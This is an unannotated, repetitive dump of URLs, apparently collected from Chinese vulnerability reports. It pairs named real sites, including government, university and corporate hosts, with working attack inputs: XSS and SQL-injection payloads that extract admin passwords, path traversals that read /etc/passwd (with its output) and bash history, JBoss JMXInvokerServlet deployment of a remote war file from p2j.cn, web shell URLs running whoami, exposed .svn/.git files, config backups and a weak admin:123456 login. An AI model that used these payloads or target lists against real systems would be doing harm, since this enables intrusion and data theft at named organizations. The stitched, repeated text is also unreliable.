http://v.baidu.com/v?word=zz%22%3E%3Cimg%20src=x%3Exxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=utf-8&order=1&sc=4&pn=0 inurl:/epaper 
http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm http://zcrb.zcwin.com/epaper/ http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD%C8%D5%B1%A8&pubdate=2014-07-24&pagename=01&pubpath=aper/dzrb/html http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html http://www.pyxww.cn:8080/epaper/paper.jsp?papername=%E5%A7%D1%F4%C8%D5%B1%A8&pubdate=2015-03-05&pagename=01&pubpath=pyrb/html http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm http://xyz.lsol.com.cn/epaper/search/index.jsp http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm http://58.42.132.75:8080/epaper/trrb/html/ http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm http://szb.xgrb.cn:9999/epaper/ http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm http://www.baoshandaily.com:8080/epaper/search/index.jsp http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm http://61.153.66.148/epaper/search/index.jsp http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm 
http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm http://www.daimayi.com/index.php/Message/detail/id/33 http://www.daimayi.com/index.php/Message/detail/id/31 http://www.daimayi.com/index.php/Message/detail/id/33-2 http://admission.zstu.edu.cn/about.asp?id=2&type1=2 http://admission.zstu.edu.cn/about.asp?id=2&type1=2 http://sqlmap.org http://merch.cib.com.cn/merchant/merchant/loginMer inurl:/epaper http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm http://zcrb.zcwin.com/epaper/ http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html http://www.pyxww.cn:8080/epaper/paper.jsp?papername= http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm http://xyz.lsol.com.cn/epaper/search/index.jsp http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm http://58.42.132.75:8080/epaper/trrb/html/ http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm http://szb.xgrb.cn:9999/epaper/ http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm 
http://www.baoshandaily.com:8080/epaper/search/index.jsp http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm http://61.153.66.148/epaper/search/index.jsp http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm http://zz.yiban.cn/ http://www.3kloan.com/login.do?method=wjmm http://zone.jd.com/help/tohelp.htm?key=CMS-10-07e0896a0c79a057000001%3Cimg%20src=1%20onerror=alert%281%29%3E http://113.105.64.211/是腾邦的 http://113.105.64.211:8080/Account/Login.aspx http://113.105.64.211:8080/WebResource.axd?d=IW7f190VPT_NcCR www.dfrobot.com.cn http://lib.njust.edu.cn/english/content.asp?id=2 http://lib.njust.edu.cn/english/content.asp?id=2 http://sqlmap.org http://group.tempus.cn/pw/job2/UI/employ_introduce.as http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=205055095&callback= http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=205055095&callback=test http://www.shouliwang.com/travel/editor/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=C:/ http://www.glsc.com.cn/glzq/question.do?currentPage=2&keyCode=question_glzb0&method=getQuestionByKeyCode2&pagesize=12&totalCount=14 http://demo.jspgen.net:81/CMS/Node.gen?Id=14 http://www.aklanao.com/CMS/Node.gen?Id=6 http://linye.langao.gov.cn/CMS/Node.gen?Id=1 http://jm.langao.gov.cn/CMS/Node.gen?Id=1 http://xinfang.langao.gov.cn/CMS/Node.gen?Id=1 http://lg3e.langao.gov.cn/CMS/Node.gen?Id=1 http://lgjw.langao.gov.cn/CMS/Node.gen?Id=1 http://ngs.langao.gov.cn/CMS/Node.gen?Id=1 http://www.lgjw.gov.cn/CMS/Node.gen?Id=29 http://www.sxhbgz.com/CMS/Node.gen?Id=29 http://www.lgjcy.gov.cn/CMS/Node.gen?Id=7 http://hbj.ankang.gov.cn/CMS/Node.gen?Id=20 http://www.zhp.gov.cn/CMS/Node.gen?Id=9 http://www.jspgen.com/CMS/Node.gen?Id=8 
http://www.akbc.cn/CMS/Node.gen?Id=35 http://wjdfdc.com.cn/CMS/Node.gen?Id=14 http://www.xahuat.com/CMS/Node.gen?Id=1 http://www.lgzf.gov.cn/CMS/Node.gen?Id=1 http://www.aklanao.com/CMS/Node.gen?Id=1 http://www.lncmee.com/ http://bbs.meizu.cn/live.html http://fin.yundasys.com:7088/Web_sc/programs.gn http://card.yaic.com.cn/online/web/sale/card/login.jsp http://card.yaic.com.cn/online/web/sale/card/download/download.jsp http://daimayi.com/index.php/Counselor/detail/id/76 http://113.105.128.146:8080/edoas2/oa.jsp http://113.105.128.146:8080/zecmd/zecmd.jsp?comment=whoami http://121.33.188.60/edoas2/oa.jsp http://121.33.188.60/zecmd/zecmd.jsp?comment=whoami http://110.64.192.212/edoas2/oa.jsp http://110.64.192.212/zecmd/zecmd.jsp?comment=whoami http://121.10.235.104/edoas2/oa.jsp http://121.10.235.104/zecmd/zecmd.jsp?comment=whoami http://49.115.145.206/web_shell_cmd.gch http://sales.tempus.cn系统登录处 http://dtdrc.gov.cn http://115.236.101.203:9300/ http://www.glsc.com.cn/glzq/mobileQuestion.do?method=listQuestionForPage&qType=tbAdvice* http://www.glsc.com.cn/glzq/jyzx/info_content.jsp?id=486551567207* http://www.glsc.com.cn/glzq/financing/management/new_y5.jsp?fundcode=B40325* http://www.glsc.com.cn/glzq/f10Action.do?codes=*1dV&method=getJTBshow&pagesize=7 http://www.glsc.com.cn www.glsc.com.cn http://www.fjedu.gov.cn/ http://www.fjedu.gov.cn/html/jyyw/tpxw/2015/04/22/3a30378e-66df-42d8-8d1a-3f9dd3fd2f6d.html http://www.fjedu.gov.cn/submission/showAttach.do?path=99999950/2015/04/22/QQ图片20150421155912_编辑.jpg&fileName=QQ图片20150421155912_编辑.jpg&isAttach=0 http://www.fjedu.gov.cn/submission/showAttach.do?path=99999950/2015/04/22/../../../../../../../../../etc/passwd&fileName=passwd&isAttach=0 http://wapdhsh.szkuniu.com/admin/ http://wan.bigertech.com/ http://116.211.118.6:8080/ http://www.100exam.com/topper/syslogin.aspx http://bug.kokozu.net/ http://log.komovie.cn/ http://www.ylrtv.com.cn/media_vod/read.php?TopicCode=1104020A 
http://www.suning.com/emall/SNNetStoreView?storeId=10052&catalogId=10051&storeType=1 google:inurl:companycglist.aspx?ComId=* http://eps.umgg.com.cn/PriceDetail/PriceComposition_Formula.aspx?elementId=1&indexNum=3 http://eps.umgg.com.cn/Products/Category/CategoryOption.aspx?option=IsStop&classId=1 http://eps.umgg.com.cn/Products/Tiens/CategoryStockView.aspx?id=1 http://b.weimai.com/.git/config http://aps.stc.gov.cn:8082/kszzyy/specialLogin_toUpdatePwd.action http://**.**.**/mnks/aq2014/mn.aspxID=xxxx http://221.2.149.28:8090/lslp/WHOut/DistrictIndex_Sc.aspx?DFID=JQ http://www.rcsp.cn:8083/lslp/WHOut/DistrictIndex_Sc.aspx?DFID=JQ http://222.135.78.34:8083/lslp/WHOut/DistrictIndex_Sc.aspx?DFID=JQ http://www.rszwfwzx.gov.cn/lslp/whout/DistrictIndex_Sc.aspx?DFID=JQ http://www.whaac.gov.cn:8090/lslp/whout/DistrictIndex_Sc.aspx?DFID=JQ http://vip.game.pps.tv/index.php?r=userCenter/myProfile http://si.power.10086.cn/si/portal/login.jsp http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100014391&ticket=46F7E46EEC319B9598DCB64194B3E05C&domain=si http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010000 http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010001 http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010002 http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010888 http://si.power.10086.cn https://user.lufax.com/user/sem-register2 site:wapmail/index.action http://www.gczw.gov.cn/portal/xzsp4/newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://www.gjzwzx.cn/portal/xzsp3//newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://www.dtzwdt.gov.cn/portal/xzsp3/newlist2.aspx?columntitle=%E5%A4%A7%E5%8E%85%E5%88%B6%E5%BA%A6 http://121.30.211.2:81/portal/lingqiuxian_xzsp3/newlist2.aspx?columntitle=%E5%A4%A7%E5%8E%85%E5%88%B6%E5%BA%A6 
http://211.142.37.152:85/portal/xzsp3//newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://121.30.251.3:85/portal/xzsp3//newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://www.sdbcn.net http://222.175.126.77 http://www.sdbcn.net:8080/UMS_Web_Update/jsp/UMS3_Web/UMS_ApplyReg.jsp http://222.175.126.77:8080/invoker/JMXInvokerServlet http://222.175.126.77:8080/invoker/JMXInvokerServlet system:service=MainDeployer http://p2j.cn/is.war http://59.151.102.45/ems http://zhaopin.cnooc.com.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml http://zhaopin.cnooc.com.cn:90/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml http://zhaopin.cnooc.com.cn/hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null http://zhaopin.cnooc.com.cn/hrss/ref.show.d?refcode=HI000000000000000003 http://www.bjlylq.com.cn/second.asp?id=13 http://121.10.24.134:28017/ http://bi.anzhi.com:9914/ http://down.chinaz.com/soft/33718.htm http://网址/showinfo/index.asp?pone=48&id=88%20union%20select%201,UserName,3,4,Password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20Admin http://res.10010js.com/ http://res.10010js.com/agent/smrz/ http://www.zdlife.com/front/downLoad.do?resourceUrl=/../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin 
abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tomcat:x:500:500::/home/tomcat:/bin/bash rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin http://www.oneplus.cn/user/addr/query http://ko.7daysinn.cn:7711 http://ko.7daysinn.cn:7711/web.txt http://192.168.74.103:7703/Service.asmx"/ http://49.5.4.44 http://49.5.4.44/jmx-console/ http://49.5.4.44/invoker/JMXInvokerServlet http://bbs.junzhuan.com/uc_server/data/config.inc.php.bak http://www.zjhrss.gov.cn/download/downfile.jsp?pathfile=download/downfile.jsp&sitename=zjstmhwz http://wap.szkuniu.com/admin/ http://wap.szkuniu.com:80/ http://wooyun.org/bugs/wooyun-2010-087662 http://www.nbccts.com/visathree.aspx?vid=%E6%96%B0%E5%8A%A0%E5%9D%A1 http://role.wanmei.com//tool/serverlist/server!getName.action http://122.228.76.107:8080/ http://60.247.79.29/ http://60.247.79.29:8383/ http://bbs.scgl.dota2.com.cn/ http://bbs.ts.wanmei.com http://mall.51wan.com/address_index_update_1804.html http://mall.51wan.com/address_index_update_1800.html http://mall.51wan.com/address_index_update_2.html http://crm.7daysinn.cn/ http://blog.sohu.com/s/MTg0NjgxNTA2/262808870.html http://124.129.19.86/zh_cn/webui.html http://www.ks2y.com/cms/ZJCX.aspx?LMID=69 http://www.zjtongde.com/cms/zjcx.aspx?lmid=69 http://www.z2hospital.com/cms/mzpb1.aspx?LMID=56 http://www.zjqhyy.com/cms/mzpb1.aspx?LMID=26 http://www.hz3yy.com/Job.aspx?MID=249 http://www.zjhl.org/cms/Job.aspx?LMID=63 http://www.zjqhyy.com/cms/Job.aspx?LMID=6 huizhi2000.xicp.net/common/web_meeting/index.php http://service.wanmei.com 
http://service.wanmei.com/ http://222.222.131.248/ http://www.linekong.com/job/ www.csytv.com http://www.csytv.com/.svn/entries http://xadmin.wanhui.cn/login/index http://219.235.129.108:8080/NewManager/,如图 http://219.235.129.108:8080/NewManager/admin/login.action,测试如下: http://219.235.129.108:8080/NewManager/shell.jsp,如图 http://120.202.47.158:8083/machineIndex.action http://120.202.47.158:8083/wsdt/showWssbIndex.action http://lygdlzxyey.com/tushu/default.asp http://www.gyxsqex.com/tushu/default.asp http://lsxnmxx.js.cn:41516/tushu/default.asp http://www.gyxjsxx.com//tushu/default.asp http://112.4.228.169:880/default.asp http://xytest.staff.xdf.cn http://60.191.106.201/left.asp http://60.191.106.201/tz.asp,然后喵了一下 https://58.221.91.194/login.html http://58.30.254.17:9200/admin-console/ http://58.30.254.17:9200/jmx-console/ http://www.ggjrw.com/e/member/zhengce/save.php http://60.28.251.218:8080/resin-admin/status.php https://github.com/PingPlusPlus/pingpp-go/blob/ff92ac0047ccb1356f1abc67f479b1b1521cec3e/paytest.go http://test.pinpula.com:8989/ https://github.com/ark930/upmp-mer-test/blob/ba7ad5c22c4b623a1f433fc4ff3efa78752eeff8/util/mail.py http://b2b.flnet.com/ admin:123456 http://www.donews.com/specialqc/tool/feedback.php?bid=1 http://member.bytevalue.com/bytevalue.tar.gz http://58.216.10.38/phpmyadmin/ http://www.bytevalue.com/bvos/ http://58.216.10.38/phpinfo.php http://member.bytevalue.com/crossdomain.xml http://58.216.10.38/p.php http://member.bytevalue.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=11 http://jinan.youshang.com/help/kiszyb/search.php?q=123 http://jinan.youshang.com/help/kiszyb/search.php?q=123 http://demo.cse.edu.cn/JYXH/ZiYuanCenter.aspx?channelID=000000080001 http://58.23.113.19:8886/urc/login/LoginSuccess.do http://58.23.113.19:8886/urc/help/zh/manual.htm http://58.23.113.19:8886/urc/xz01/h01/h0101/H0101Retrieve.do http://meijugou.focus.cn http://www.phys.sinica.edu.tw/directory_user.php?id_key=7 
http://vb.vlinkage.com http://223.100.49.52/ http://223.100.49.51/ http://wiki.hexun.com http://wiki.hexun.com/search.aspx?q= http://61.233.6.86/login.do http://61.233.6.86/jmx-console http://61.233.6.86/invoker/JMXInvokerServlet http://wwwdemo.wandafilm.com//user/myCoupons.do?m=giveCoupons http://wwwdemo.wandafilm.com http://fripside.sinaapp.com/1aaa.js http://gbsztest.daxiangqun.net/index.php/Index/search http://erp.foxitsoftware.cn http://logistics.flnet.com/ www.ntfybj.com/interface/yygh/ser-center/ https://github.com/hewr1993/heartbeat/blob/147a0e84a9d4b7c78dd44914c4879868da413f50/heartbeat.py https://42.156.162.10 https://sso.aliloan.com https://ecdcc.aliloan.com http://rsc.em.swjtu.edu.cn/newsinfo.asp?id=123 http://rsc.em.swjtu.edu.cn/admin/Login.asp http://www.sasacgs.gov.cn/leaderList.jsp?lab=3&classid=23 https://my.guanaitong.com/index.php?m=p_address&a=change&id=00001 http://hui.aili.com/ http://hunjia.55bbs.com/files/bride/list.php?s=1&q=&page=396 http://61.142.174.200/cwc/KFweb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://cycwc.gzife.edu.cn/kefa/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://cw.syu.edu.cn:8080/KfWeb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://58.16.80.232/kefa/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://221.5.51.228/cjb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://www.shcdkf.com/kfweb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110 http://www.gzzyhk.com/ http://www.gobooking.cn/newquery/admin-manager/gnTicketManager/order_viewedit.asp?order_id=20100121143350 http://www.bjhxjipiao.com http://82750000.com/ http://www.antai1688.com http://jp-053282723000.com/ http://www.qdfh-air.com http://www.gzhuaju.net http://www.83885886.cn http://www.js-air.com/ 
http://www.jq166.com http://www.4006222886.com http://www.osenair.com/ http://iosappapi.wepiao.com/?m=web&c=film&a=filmdetail&fid=5577 http://m.hylinkad.com http://m.hylinkad.com/hylinkad/createSignature.do http://m.hylinkad.com/jobsManage/saveHeadPic.do http://m.hylinkad.com/jobsManage/saveUserInfo.do http://m.hylinkad.com/jobsManage/saveUserInfo.do http://tg.tttuangou.net/ http://sg.myj.com.cn/order/detail/2147217 http://v2.xkeshi.com/shop?key=* http://tv.sohu.com/feihuindex4/ http://y.memewan.com/a6.htm这一个广告的页面 http://www.600bbb.cn/这一个网站中 http://wms.flnet.com/ http://www.awotuan.com/.svn/entries http://www.zpsoso.com/.svn/entries http://www.xiushao.com/.svn/entries http://www.pailezu.com/.svn/entries http://www.tuanai.com/.svn/entries http://mobile.ipe.org.cn/app/app_V2.asmx?op=ModifyUser_PwdValidateCode http://mobile.ipe.org.cn/app/app_V2.asmx?op=ModifyUser_PwdValidateCode http://**.**.**/UserManage/Login.aspx http://www.bjprd.com.cn:88/PreciousE/common/infoList.asp?str=1 http://210.30.190.86/PreciousE/common/infoList.asp?str=2 http://zcgl.usc.edu.cn/gzyq/common/infoList.asp?str=1 http://202.119.206.110/PreciousE/common/infoList.asp?str=1 http://sbgx.nefu.edu.cn/peweb/common/infoList.asp?str=1 http://202.201.152.152/pe/common/infoList.asp?str=1 http://202.118.31.223:801/pe/common/infoList.asp?str=1 http://pxzx.zjdpc.gov.cn/ZXJJ.aspx?t=9存在注入 http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml float:left display:block;height:40px;line-height:40px;color:#FF6600;font-family:Verdana,Geneva,sans-serif;font-weight:bold margin-top:10px;float:left display:block float:left;font-size:12px text-align:left padding-left:20px height:40px line-height:40px margin-left:10px http://t.jiwu.com/agent!tofindpwd.action# https://www.google.co.jp/?gfe_rd=cr&ei=KmxpVezNLITWuALnyYD4Cw#q=site:chaoxing.com+portal/schoolCourseInfo/courseOutline&safe=off&filter=0 http://muc.benke.chaoxing.com/portal/schoolCourseInfo/courseOutline?courseName=*&pageNum=4 
http://muc.benke.chaoxing.com/portal/schoolCourseInfo/courseOutline?courseName=*&pageNum=4 http://**.**.**/ http://design.moonbasa.com/star/wp-login.php http://ss.linekong.com/xml/common.php?num=5&sort_id=97 IP:218.207.123.15 http://gzb2.net/News/gzb_mng/Login.asp http://hr.ztgame.com/ http://www.dyshxx.com:235/dylgy/login.aspx http://tmctest.careland.com.cn/dbtools/data/ http://mss.alxd.com.cn/user/ http://www.rz.com/index.php http://ee.cqupt.edu.cn/search.php Database:bishe http://202.85.212.108:8080/login!login.do http://hongyan.cqupt.edu.cn/gjpd/zyjn/admin/admin.php http://**.**.**/_ http://www.baidu.com/s?ie=UTF-8&wd=Copyright+ATA+1999-2008.+All+Rights+Reserved http://www.228.com.cn/customer/login.html www.shmgc.com http://oa.cntmi.com/ http://58.30.56.38/ http://58.30.56.38/invoker/JMXInvokerServlet部署war进行getshell http://58.30.56.38/invoker/JMXInvokerServlet system:service=MainDeployer http://p2j.cn/is.war http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b http://www.js808.cn/ind/pass_step1.html http://abtest.moonbasa.com/admin/ http://61.142.174.200/cwc/KFweb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://cycwc.gzife.edu.cn/kefa//admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://cw.syu.edu.cn:8080/KfWeb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://58.16.80.232/kefa/admin//v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://221.5.51.228/cjb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://www.shcdkf.com/kfweb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://woa.unicomgd.com/moa/jrfx/sssr.aspx?type=003 http://woa.unicomgd.com/moa.files/CNCROOTCA.cer http://www.ks2y.com/cms/GuestBook.aspx?LMID=49 http://www.z2hospital.com/cms/GuestBook.aspx?lmid=111 http://www.hnzyy.cn/cms/GuestBook.aspx?LMID=49 http://www.ksskfyy.com/cms/GuestBook.aspx?lmid=955 http://www.zjcc.org.cn:8000/cms/GuestBook.aspx?lmid=58 http://www.ks2y.com/cms/mzpb2.aspx?LMID=102 
http://sig.cem.org.cn/cms/mzpb2.aspx?LMID=57 http://www.z2hospital.com/cms/mzpb2.aspx?LMID=57 http://pic.3234.com/config.inc.php pdo:mysql https://github.com/githubpaul/rackmonkey/blob/eb94bbdace564ba00ed5895996530fdf062380f4/conf/httpd-rackmonkey.conf http://cloud.inspur.com/icpserver/uu/inputAccountInfo.do http://urp.tongji.edu.cn/userAttributesView.portal?userId=amAdmin http://urp.tongji.edu.cn/getBackPassword.portal http://urp.tongji.edu.cn/ http://cloud.inspur.com/solr/#/ URL:http://fanli.mizhe.com/mz_comment/lists_mall.html http://yanshi.nuoran.net/1273/admin http://mobile.qiandw.com/Weily/ http://mobile.qiandw.com/Weily/Conf/weily.db encryption:TTept6iU8Jd5mhOCirsW49yugxvzMfdB2Vxnl812nhE+Zh6xY5hpUXa/tKXKi3uYuSHMUsFoMmKWoVX4y9jOpQ== http://bobao.360.cn/learning/detail/163.html http://law.cqupt.edu.cn/kecheng/mf/exam.php?id=&cat_id=10 http://123.234.41.25 http://123.234.41.25/web/shell.asp http://60.2.126.26:9999/ggsjzx/userlogin.action http://imusic.wo.com.cn http://imusic.wo.com.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://115.236.77.174:81/.svn/entries http://baike.huaji.com/.svn/entries http://shop.huaji.com/.svn/entries http://bbs.huaji.com/images/wind/file/.svn/entries http://bbs.huaji.com/.svn/entries http://bbs.huaji.com/images/face/.svn/entries http://bbs.huaji.com/images/post/smile/wangwang/.svn/entries http://bbs.huaji.com/images/post/smile/default/.svn/entries http://bbs.huaji.com/images/wind/level/.svn/entries http://bbs.huaji.com/images/wind/thread/.svn/entries http://bbs.huaji.com/images/.svn/entries http://bbs.huaji.com/images/wind/index/.svn/entries http://a.huaji.com/server-status http://help.huaji.com/server-status http://115.236.77.174 http://bbs.xiaoyuer.com/ucenter/data/tmp/upload1251.jpg/.php www.upyun.com http://www.17u.com/ http://111.12.219.18/Login.aspx http://www.citicsf.com/download.jsp?fileName=../WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd http://www.citicsf.com/ inurl:/epaper http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm http://zcrb.zcwin.com/epaper/ http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html http://www.pyxww.cn:8080/epaper/paper.jsp?papername= http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm http://xyz.lsol.com.cn/epaper/search/index.jsp http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm http://58.42.132.75:8080/epaper/trrb/html/ http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm http://szb.xgrb.cn:9999/epaper/ http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm http://www.baoshandaily.com:8080/epaper/search/index.jsp http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm http://61.153.66.148/epaper/search/index.jsp http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm 
